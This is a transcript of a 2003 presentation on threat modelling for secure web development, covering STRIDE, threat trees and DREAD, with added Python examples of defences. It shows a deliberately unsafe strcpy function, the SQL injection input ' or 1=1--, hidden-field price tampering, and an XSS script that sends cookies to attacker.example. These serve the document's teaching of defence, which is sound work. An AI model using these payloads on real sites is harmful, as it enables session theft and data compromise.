Threat Modeling for Secure Web Application Development Rafal Lukawiecki Strategic Consultant Project Botticelli Ltd.

Presentation transcript:


Slide 2: Objectives
- Introduce the challenges
- Introduce some common threats
- Overview the threat modelling process
- Stress the weaknesses

The Challenges

Slide 4: Security Definition
- Security (Cambridge Dictionary of English): the ability to avoid being harmed by any risk, danger or threat
- ...therefore, in practice, an impossible goal. What can we do then?
- Be as secure as needed: the ability to avoid being harmed too much by reasonably predictable risks, dangers or threats (Rafal's definition)

Slide 5: 1st Conclusion
- As 100% security is impossible, you need to decide what needs to be secured and how well it needs to be secured
- In other words, you need a process and an approach for designing in security

Slide 6: Challenge
- Security must be balanced with usability (and accessibility)
- Most secure = useless; most useful = insecure
- Know the balance, based on risk analysis

Slide 7: Holistic Approach
- Security is the relationship of the elements of the system: network, host, application, organisation, people, politics
- Strengthening one often decreases the security of the whole

Slide 8: Security is Expensive
- And now it seems to be increasingly more important than performance and feature-richness
- Prioritising features or performance over security must be a conscious choice: very dangerous, and unlikely to survive in the long term

Slide 9: Improving the Application Development Process
- Consider security at the start of the process, throughout development, through deployment, and at all software review milestones
- Think of security as a process, not a feature or even a state

The Threats

Slide 11: Potential Attackers
- Thieves, confidence tricksters, vandals, criminals, hackers
- It should be no surprise that attacks occur!

Slide 12: Types of Threats
- Threats against the network: spoofed packets, etc.
- Threats against the host: buffer overflows, illicit paths, etc.
- Threats against the application: SQL injection, XSS, input tampering, etc.

Slide 13: Threats Against the Network (threat: examples)
- Information gathering: port scanning; using trace routing to detect network topologies; using broadcast requests to enumerate subnet hosts
- Eavesdropping: using packet sniffers to steal passwords
- Denial of service (DoS): SYN floods; ICMP echo request floods; malformed packets
- Spoofing: packets with spoofed source addresses

Slide 14: Threats Against the Host (threat: examples)
- Arbitrary code execution: buffer overflows in ISAPI DLLs (e.g., MS01-033); directory traversal attacks (MS00-078)
- File disclosure: malformed HTR requests (MS01-031); virtualized UNC share vulnerability (MS00-019)
- Denial of service (DoS): malformed SMTP requests (MS02-012); malformed WebDAV requests (MS01-016); malformed URLs (MS01-012); brute-force file uploads
- Unauthorized access: resources with insufficiently restrictive ACLs; spoofing with stolen login credentials
- Exploitation of open ports and protocols: using NetBIOS and SMB to enumerate hosts; connecting remotely to SQL Server

Slide 15: Threats Against the Application (threat: examples)
- SQL injection: including a DROP TABLE command in text typed into an input field
- Cross-site scripting: using malicious client-side script to steal cookies
- Hidden-field tampering: maliciously changing the value of a hidden field
- Eavesdropping: using a packet sniffer to steal passwords and cookies from traffic on unencrypted connections
- Session hijacking: using a stolen session ID cookie to access someone else's session state
- Identity spoofing: using a stolen forms authentication cookie to pose as another user
- Information disclosure: allowing the client to see a stack trace when an unhandled exception occurs

Slide 16: Most Common Threats
- Buffer overrun
- SQL injection
- Cross-site scripting
- Hidden-field tampering
- Session hijacking
- Identity spoofing
- Information disclosure

Slide 17: What Is a Buffer Overrun?
- Occurs when data exceeds the expected size and overwrites other values
- Exists primarily in unmanaged C/C++ code
- Includes four types: stack-based buffer overruns; heap overruns; v-table and function pointer overwrites; exception handler overwrites
- Can be exploited by worms

Slide 18: Possible Results of Buffer Overruns (possible result: attacker's goal)
- Access violation: to perform denial of service attacks against servers
- Instability: to disrupt the normal operation of software
- Code injection: to gain privileges for their own code; to exploit vital business data; to perform destructive actions

Slide 19: Stack-Based Buffer Overrun Example
The slide's deliberately unsafe function (the buffer declaration belongs inside the function; strcpy needs string.h):

    #include <string.h>

    void UnSafe(const char* uncheckedData)
    {
        char localVariable[4];      /* 4-byte buffer on the stack */
        int anotherLocalVariable;
        /* strcpy performs no bounds check: input longer than 3 characters plus the
           terminating NUL overwrites whatever sits next to localVariable on the stack */
        strcpy(localVariable, uncheckedData);
    }

Stack layout shown on the slide, from the top of the stack: char[4], int, return address.

Slide 20: SQL Injection
- Exploits applications that use external input in database commands: input from fields; input from query strings
- The technique: find a field or query string parameter used to generate SQL commands; submit input that modifies the commands; compromise, corrupt, and destroy data

Slide 21: How SQL Injection Works
"Model" query, built by string concatenation:

    "SELECT COUNT(*) FROM Users WHERE UserName='" & Field1.Text & "' AND Password='" & Field2.Text & "'"

Malicious query, produced when the user enters ' or 1=1-- in the user name field:

    SELECT COUNT(*) FROM Users WHERE UserName='' or 1=1--' AND Password=''

- "or 1=1" matches every record in the table
- "--" comments out the remainder of the query
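The slide's concatenated login query next to a parameterised version, run against an in-memory SQLite table with constructed data; this is an added example, not code from the presentation.

```python
# Added example (not from the slides): the slide's concatenated login query beside a
# parameterised version, run against an in-memory SQLite table with constructed data.
import sqlite3

# Constructed sample data; plaintext passwords only to keep the demonstration short.
conn = sqlite3.connect(":memory:", check_same_thread=False)
conn.execute("CREATE TABLE Users (UserName TEXT, Password TEXT)")
conn.execute("INSERT INTO Users VALUES ('alice', 's3cret'), ('bob', 'hunter2')")
conn.commit()


def count_users_vulnerable(user_name: str, password: str) -> int:
    """The slide's 'model' query: user input is pasted straight into the SQL text."""
    sql = ("SELECT COUNT(*) FROM Users WHERE UserName='" + user_name
           + "' AND Password='" + password + "'")
    return conn.execute(sql).fetchone()[0]


def count_users_parameterised(user_name: str, password: str) -> int:
    """Same query with bound parameters: the driver passes the input as data, so
    quotes and '--' inside it cannot change the statement's structure."""
    sql = "SELECT COUNT(*) FROM Users WHERE UserName=? AND Password=?"
    return conn.execute(sql, (user_name, password)).fetchone()[0]


def login_allowed(user_name: str, password: str) -> bool:
    """The decision the application should make, using the parameterised query."""
    return count_users_parameterised(user_name, password) == 1


if __name__ == "__main__":
    payload = "' or 1=1--"                                            # input from slide 21
    print("vulnerable:", count_users_vulnerable(payload, ""))        # 2: every row matched
    print("parameterised:", count_users_parameterised(payload, ""))  # 0: no such user
    print("alice/s3cret:", login_allowed("alice", "s3cret"))         # True
```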

Slide 22: Cross-Site Scripting (XSS)
- Exploits applications that echo raw, unfiltered input to Web pages: input from fields; input from query strings
- The technique: find a field or query string parameter whose value is echoed to the Web page; enter malicious script and get an unwary user to navigate to the infected page; steal cookies, deface and disable sites

Slide 23: How Cross-Site Scripting Works

    <a href=" Search= document.location.replace (' Cookie=' + document.cookie); ">...

Annotations on the slide:
- The href holds the URL of the site targeted by the attack
- The query string contains embedded JavaScript that redirects to the attacker's page and transmits the cookies issued by Search.aspx in a query string
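Output encoding and cookie flags as the countermeasures to the attack above, checked against the slide's script; this is an added example, not code from the presentation, and the attacker host is a constructed placeholder.

```python
# Added example (not from the slides): a search page that echoes its query raw, beside
# one that HTML-encodes it, checked against slide 23's cookie-stealing script.
import html

# Constructed payload: the script from slide 23 with a placeholder attacker page.
PAYLOAD = ("<script>document.location.replace("
           "'https://attacker.example/?Cookie=' + document.cookie);</script>")


def render_results_unsafe(search: str) -> str:
    """Echoes the Search parameter raw: script inside it runs in the victim's browser."""
    return "<p>Results for: " + search + "</p>"


def render_results_safe(search: str) -> str:
    """HTML-encodes the echoed value, so < > " ' & are displayed, not interpreted."""
    return "<p>Results for: " + html.escape(search, quote=True) + "</p>"


def session_cookie_header(session_id: str) -> str:
    """Issues the session cookie with HttpOnly (script cannot read document.cookie even
    if it does run) and Secure (never sent over plain HTTP, which also addresses the
    eavesdropping threat on slide 15)."""
    return f"Set-Cookie: SessionId={session_id}; HttpOnly; Secure; SameSite=Lax; Path=/"


def contains_active_script(page: str) -> bool:
    """Crude check used by the demo: does the rendered page contain a live <script tag?"""
    return "<script" in page.lower()


if __name__ == "__main__":
    print(render_results_unsafe(PAYLOAD))   # script tag survives
    print(render_results_safe(PAYLOAD))     # &lt;script&gt;... rendered as text
    print(session_cookie_header("constructed-session-id"))
```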

Slide 24: Hidden-Field Tampering
- Web developers sometimes use hidden fields to persist data between requests
- Hidden fields are not really hidden!

Slide 25: How HF Tampering Works
Page contains this:

    <input type="hidden" name="price" value="$10,000">

Postback data should contain this:

    price="$10,000"

Instead it contains this:

    price="$1"

- type="hidden" prevents the field from being seen on the page, but not in View Source
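Two server-side defences against the tampered postback above: an authoritative price lookup, and an HMAC-signed hidden field for state that must round-trip through the client. This is an added example, not code from the presentation; the catalogue and key are constructed.

```python
# Added example (not from the slides): two ways to stop the $10,000 -> $1 tampering
# shown on slide 25. Catalogue and key are constructed for the demo.
import hashlib
import hmac

CATALOGUE = {"sku-100": 10000}          # constructed: authoritative server-side prices
SERVER_KEY = b"constructed-demo-key"    # a real deployment loads this from a secret store


def price_from_catalogue(form: dict) -> int:
    """Preferred fix: ignore any posted price and look it up by product id on the server."""
    return CATALOGUE[form["sku"]]


def sign_hidden_field(name: str, value: str) -> str:
    """HMAC over name and value, so the client cannot alter the value without the key."""
    return hmac.new(SERVER_KEY, f"{name}={value}".encode(), hashlib.sha256).hexdigest()


def render_hidden_price(price: int) -> str:
    """Fallback when state must round-trip: the hidden field plus a signature field."""
    value = str(price)
    sig = sign_hidden_field("price", value)
    return (f'<input type="hidden" name="price" value="{value}">'
            f'<input type="hidden" name="price_sig" value="{sig}">')


def price_from_signed_field(form: dict):
    """Accepts the posted price only if its signature verifies; returns None otherwise."""
    expected = sign_hidden_field("price", form.get("price", ""))
    if not hmac.compare_digest(expected, form.get("price_sig", "")):
        return None
    return int(form["price"])


if __name__ == "__main__":
    honest = {"sku": "sku-100", "price": "10000",
              "price_sig": sign_hidden_field("price", "10000")}
    tampered = dict(honest, price="1")        # the slide's price="$1" postback
    print(price_from_catalogue(tampered))      # 10000: posted price ignored
    print(price_from_signed_field(honest))     # 10000: signature verifies
    print(price_from_signed_field(tampered))   # None: signature no longer matches
```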

Slide 26: Session Hijacking
- Web applications use sessions to store state
- Sessions are private to individual users
- Sessions can be compromised
Threat: risk factor
- Theft and replay of session ID cookies: High*
- Links to sites that use cookieless session state: Medium*
- Predictable session IDs: Low*
- Remote connection to state server service: Medium
- Remote connection to state server database: Medium
- Eavesdropping on state server connection: Medium
* Shorter session time-outs mitigate the risk by reducing the attack window

Slide 27: Identity Spoofing
- Security depends on authentication
- If authentication can be compromised, security goes out the window
- Authentication can be compromised
Threat: risk factor
- Theft of Windows authentication credentials: High
- Theft of forms authentication credentials: High
- Theft and replay of authentication cookies: Medium*
- Dictionary attacks and password guessing: High
* Depends on the time-out values assigned to authentication cookies

Slide 28: Information Disclosure
Which is the better error message?

The Process

Slide 30: SD3 Security Framework
- Secure by Design: secure architecture and code; threat analysis; vulnerability reduction
- Secure by Default: attack surface reduced; unused features off by default; minimum privileges used
- Secure in Deployment: protection (detect, defend, recover, manage); process (guides); people (training)

Slide 31: Identifying Threats
- Understand the problem to find the solution
- Two approaches: look at lists of common threats and see which apply to your application; threat modeling

Slide 32: Threat Modeling
- Structured analysis aimed at: finding product vulnerabilities; evaluating security threats; identifying countermeasures
- Forms the basis of the Security Specification
- The six steps: 1. Identify assets; 2. Create an architecture overview; 3. Decompose the application; 4. Identify the threats; 5. Document the threats; 6. Rate the threats

Slide 33: Identify Assets (step 1 of 6)
- What do you need to protect? Confidential data (orders, customers); Web pages; availability
- What is important?

Slide 34: Create Architecture Overview (Documenting Your Architecture) (step 2 of 6)
- Identify what the application does
- Create an architecture diagram
- Identify the technologies used

Slide 35: Architecture Diagram
[Figure: users Bob, Alice and Bill; Firewall; Web Server (IIS, ASP.NET) hosting Login, State and Main; Database Server; assets #1 to #6 marked on the diagram]

Slide 36: Decompose Application (step 3 of 6)
- Identify trust boundaries
- Identify data flow
- Identify entry points
- Identify privileged code
- Document the security profile
- Architecture & design review

Slide 37: Decomposition
[Figure: the slide 35 diagram (Bob, Alice, Bill; Firewall; Web Server with IIS, ASP.NET, Login, State, Main; Database Server) annotated with trust boundaries and the mechanisms at them: Forms Authentication, URL Authorization, DPAPI, Windows Authentication]

Slide 38: Identify Threats (step 4 of 6)
- Use STRIDE to identify threats
- Use categorized threat lists: network, host, application

Slide 39: How Are Threats Evaluated (STRIDE; type of threat: examples)
- Spoofing: forging messages; replaying authentication
- Tampering: altering data during transmission; changing data in a database
- Repudiation: deleting critical data and denying it; purchasing a product and denying it
- Information disclosure: exposing information in error messages; exposing code on a web site
- Denial of service: flooding a web service with invalid requests; flooding a network with SYNs
- Elevation of privilege: obtaining Administrator privileges; using an assembly in the GAC to create an account

Slide 40: Threat Trees
Root: Theft of auth cookies (obtain an auth cookie to spoof identity), reached by either (OR) of two branches:
- Unencrypted connection (cookies travel over unencrypted HTTP) AND eavesdropping (attacker uses a sniffer to monitor HTTP traffic)
- Cross-site scripting (attacker possesses the means and knowledge) AND XSS vulnerability (application is vulnerable to XSS attacks)
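The threat tree above as an evaluable AND/OR structure, so a team can check whether the root remains reachable after a countermeasure removes a leaf; this is an added example, not code from the presentation, and the branch names "Sniffing route" and "Script route" are my labels for the slide's two unnamed AND groups.

```python
# Added example (not from the slides): slide 40's threat tree as an AND/OR tree that
# can be evaluated against the leaf conditions believed to hold for an application.
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class Node:
    name: str
    op: Optional[str] = None            # "AND", "OR", or None for a leaf condition
    children: List["Node"] = field(default_factory=list)


# The tree as drawn on the slide: two alternative routes to the root, each needing both
# of its conditions. Branch names are assumed labels, not text from the slide.
AUTH_COOKIE_THEFT = Node("Theft of auth cookies", "OR", [
    Node("Sniffing route", "AND", [
        Node("Unencrypted connection"),     # cookies travel over plain HTTP
        Node("Eavesdropping"),              # attacker can sniff the HTTP traffic
    ]),
    Node("Script route", "AND", [
        Node("Cross-site scripting"),       # attacker has the means and knowledge
        Node("XSS vulnerability"),          # application echoes unfiltered input
    ]),
])


def feasible(node: Node, holds: set) -> bool:
    """True if this node can be reached given the set of leaf conditions that hold."""
    if node.op is None:
        return node.name in holds
    results = [feasible(child, holds) for child in node.children]
    return all(results) if node.op == "AND" else any(results)


def attack_paths(node: Node) -> List[frozenset]:
    """Every minimal set of leaf conditions that reaches this node (its cut sets)."""
    if node.op is None:
        return [frozenset([node.name])]
    if node.op == "OR":
        return [path for child in node.children for path in attack_paths(child)]
    paths = [frozenset()]
    for child in node.children:
        paths = [p | q for p in paths for q in attack_paths(child)]
    return paths


if __name__ == "__main__":
    all_leaves = {"Unencrypted connection", "Eavesdropping",
                  "Cross-site scripting", "XSS vulnerability"}
    print(feasible(AUTH_COOKIE_THEFT, all_leaves))                               # True
    # Slide 42's countermeasures remove leaves: SSL removes the unencrypted connection,
    # input validation and output encoding remove the XSS vulnerability.
    print(feasible(AUTH_COOKIE_THEFT, {"Eavesdropping", "Cross-site scripting"}))  # False
    for path in attack_paths(AUTH_COOKIE_THEFT):
        print(sorted(path))
```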

Slide 41: Document Threats (step 5 of 6)
- Document, for each threat: threat, target, risk, attack techniques, countermeasure
- Leave risk blank for now (it is filled in when the threats are rated in step 6)

Slide 42: Document Threats (example; description: target, risk, attack techniques, countermeasures)
- Attacker obtains credentials: target = user authentication process; risk = (left blank); attack technique = sniffer; countermeasure = use SSL to encrypt the channel
- Injection of SQL commands: target = data access component; risk = (left blank); attack technique = append SQL to the user name; countermeasures = validate the user name; parameterized stored procedure for data access

Slide 43: Rate Threats (step 6 of 6)
- Rate risk
- Order by risk
- Address in order
- Use DREAD
- Risk exposure = Probability * Damage Potential

Slide 44: Rating Threats
- Simple model based on the concept of risk exposure: Risk = Probability * Damage Potential
- Probability on a 1-10 scale: 1 = least probable, 10 = most probable
- Damage potential on a 1-10 scale: 1 = least damage, 10 = most damage

Slide 45: Calculating Risk (DREAD)
- D – Damage potential
- R – Reproducibility
- E – Exploitability
- A – Affected users
- D – Discoverability
- Rate each category High (3), Medium (2) or Low (1)

Slide 46: DREAD, Cont. (category: High (3) / Medium (2) / Low (1))
- Damage potential: High = attacker can retrieve extremely sensitive data and corrupt or destroy data; Medium = attacker can retrieve sensitive data but do little else; Low = attacker can only retrieve data that has little or no potential for harm
- Reproducibility: High = works every time, does not require a timing window; Medium = timing-dependent, works only within a time window; Low = rarely works
- Exploitability: High = Bart Simpson could do it; Medium = attacker must be somewhat knowledgeable and skilled; Low = attacker must be VERY knowledgeable and skilled
- Affected users: High = most or all users; Medium = some users; Low = few if any users
- Discoverability: High = attacker can easily discover the vulnerability; Medium = attacker might discover the vulnerability; Low = attacker will have to dig to discover the vulnerability

Slide 47: Calculating Risk
- Total risk levels: High = ; Medium = 8-11; Low = 5-7
Threat: DREAD scores, total, rating
- Attacker obtains credentials: High
- Injection of SQL commands: High
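DREAD scoring and ranking as defined on slides 43 to 47, applied to the threats documented on slide 42 plus the stack-trace disclosure from slide 15; this is an added example, not code from the presentation. The individual scores are constructed, and the High band (12-15) is an assumption, since slide 47 leaves that value blank.

```python
# Added example (not from the slides): DREAD totals and ratings (slides 45-47) and the
# Probability * Damage Potential model (slide 44), used to rank documented threats.
from dataclasses import dataclass
from typing import List

LEVEL = {"High": 3, "Medium": 2, "Low": 1}      # slide 45's category scores


@dataclass(frozen=True)
class DreadScore:
    threat: str
    damage: str              # Damage potential
    reproducibility: str
    exploitability: str
    affected_users: str
    discoverability: str

    def total(self) -> int:
        """Sum of the five categories; raises KeyError for a level outside High/Medium/Low."""
        return sum(LEVEL[v] for v in (self.damage, self.reproducibility,
                                      self.exploitability, self.affected_users,
                                      self.discoverability))

    def rating(self) -> str:
        t = self.total()
        if t >= 12:          # assumed: the rest of the 5-15 range above Medium
            return "High"
        if t >= 8:           # Medium = 8-11 (slide 47)
            return "Medium"
        return "Low"         # Low = 5-7 (slide 47)


def risk_exposure(probability: int, damage_potential: int) -> int:
    """Slide 44's simpler model: both inputs on a 1-10 scale, exposure is the product."""
    for v in (probability, damage_potential):
        if not 1 <= v <= 10:
            raise ValueError("scores must be between 1 and 10")
    return probability * damage_potential


def rank(scores: List[DreadScore]) -> List[DreadScore]:
    """Orders threats so the highest exposure is addressed first (slide 43)."""
    return sorted(scores, key=lambda s: s.total(), reverse=True)


# Constructed scores for the slide 42 threats and one information-disclosure threat.
THREATS = [
    DreadScore("Attacker obtains credentials", "High", "High", "Medium", "High", "High"),
    DreadScore("Injection of SQL commands", "High", "High", "High", "High", "Medium"),
    DreadScore("Stack trace shown in error page", "Low", "High", "High", "Low", "High"),
]

if __name__ == "__main__":
    for s in rank(THREATS):
        print(f"{s.total():2d} {s.rating():6s} {s.threat}")
    print("exposure:", risk_exposure(7, 9))      # 63
```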

Slide 48: Plan & Review
- Based on the security risk list and the threat model, address the issues in order of priority
- Reassess security risks when: the overall design changes; new threats become known; at regular intervals

Slide 49: Summary
- We have enough fast, feature-rich and insecure applications
- Design with security or start losing your business
- Security "testing" does not exist (yet?)
- Security paranoia is a good trait
- Use best design patterns, practices and processes

Slide 50: © 2003 Microsoft Limited. All rights reserved. This presentation is for informational purposes only. Microsoft makes no warranties, express or implied, in this summary.